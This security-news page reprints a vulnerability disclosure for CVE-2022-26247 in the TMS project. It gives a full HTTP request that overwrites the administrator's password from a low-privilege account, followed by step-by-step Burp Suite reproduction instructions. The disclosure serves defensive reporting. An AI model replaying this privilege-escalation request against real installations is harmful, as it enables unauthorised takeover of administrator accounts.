Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-26247: There is a Insecure Permissions vulnerability exists in tms · Issue #16 · xiweicheng/tms

TMS v2.28.0 contains an insecure permissions vulnerability via the component /TMS/admin/user/Update2. This vulnerability allows attackers to modify the administrator account and password.

CVE
#vulnerability#web#windows#apple#google#js#git

[Suggested description]
There is an ultra vires vulnerability in the function of modifying personal information in TMS.The vulnerability originates from / TMS / admin / user / Update2. The administrator account and password can be modified beyond his authority by modifying the packet parameters.

[Vulnerability Type]
Insecure Permissions

[Vendor of Product]
https://github.com/xiweicheng/tms

[Affected Product Code Base]
v2.28.0

[Affected Component]
POST /tms/admin/user/update2 HTTP/1.1
Host: localhost:8080
Content-Length: 66
sec-ch-ua: " Not A;Brand";v="99", “Chromium";v="92”
Accept: /
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/tms/admin/user
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=B45BEAFD82AAE86E3D98FE866FA0851E; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645604517; Hm_lpvt_a4980171086658b20eb2d9b523ae1b7b=1645604534
Connection: close

username=admin&password=88888888&name=admin&mail=admin%40google.com&=

[Attack Type]
Remote

[Vulnerability proof]

1.Access with test account http://localhost:8080/tms/admin
image

2.In order to verify the authenticity of the ultra vires vulnerability, I have prepared a system administrator account. Account number: admin, default password: 88888888.
image
Now I log in to the test account to try to change the information and password of the admin account.

3.Click the user icon in the upper right corner and select Modify in the drop-down box to open the modify personal information pop-up window.
image
image

4.Because there is no need to verify the user’s original password, you can set the new password directly. Here, the password is set as change123 in the form submission, and other information will not be changed. Open the burpsuite packet capturing agent - > click the confirm submit button.
image

5.Modify the packet capture data, as shown in the following figure.
image

6.Click forwad to finish the modification.
image

The information of viewing admin has changed.Vulnerability recurrence completed.
image

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907